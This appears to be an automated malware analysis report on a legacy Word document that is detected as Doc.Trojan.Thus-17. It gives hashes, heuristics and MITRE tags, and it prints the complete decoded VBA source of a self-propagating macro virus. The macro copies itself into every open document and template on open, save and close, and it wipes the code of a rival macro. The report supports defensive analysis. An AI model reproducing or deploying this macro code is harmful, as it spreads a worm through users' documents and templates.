Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 554f54c2670d0e5b…

MALICIOUS

Office (OLE)

35.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 92c2b5178b2677f9790524b879544671 SHA-1: 8478685e75a93210bda3dd5f0458fc5c7d404350 SHA-256: 554f54c2670d0e5b26d651492481aad5e6611c3275dfd6472b0a3d500f698a4a
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing VBA macros, specifically an Auto_Close macro and a FileOpen macro that calls a CopyMeMe subroutine. This subroutine appears to be designed to copy the macro to other open documents and templates, indicating a self-propagation mechanism. The ClamAV detection 'Doc.Trojan.Thus-17' and the presence of legacy WordBasic auto-exec markers further support its malicious nature. The primary function observed is macro propagation, suggesting it's a component of a larger attack, likely delivered via spearphishing.

Heuristics 4

  • ClamAV: Doc.Trojan.Thus-17 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-17
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1715 bytes
SHA-256: 1a0b6ca8058aa02cb32649008ba79b14c60c785edf487ef15685a8671ffed4de
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ActiveVBModule"

'This code clears the Anti-Symer virus
Sub CopyMeMe()
    On Error Resume Next
    dc% = Documents.Count
    thisn$ = ThisDocument.FullName
    For i% = 1 To dc%
    If Documents(i).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) = "'Anti-Smyser'" Then
        Documents(i).VBProject.VBComponents.Item(1).CodeModule.DeleteLines (NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
    End If
    If Documents(i).FullName <> thisn$ Then
 
    Application.OrganizerCopy Source:= _
       thisn$, Destination:= _
        Documents(i).FullName, Name:="ActiveVBModule", Object:= _
        wdOrganizerObjectProjectItems
          End If
     Next
    dc% = Templates.Count
    For i% = 1 To dc%
       If Templates(i).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) = "'Anti-Smyser'" Then
        Templates(i).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, Templates(i).VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If

    
    Application.OrganizerCopy Source:= _
       thisn$, Destination:= _
        Templates(i).FullName, Name:="ActiveVBModule", Object:= _
        wdOrganizerObjectProjectItems
    Next
End Sub
Sub FileOpen()
On Error Resume Next
    Dialogs(wdDialogFileOpen).Show
    CopyMeMe
End Sub
Sub AutoClose()
 On Error Resume Next
 CopyMeMe
End Sub
Sub FileSave()
    On Error Resume Next
    CopyMeMe
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.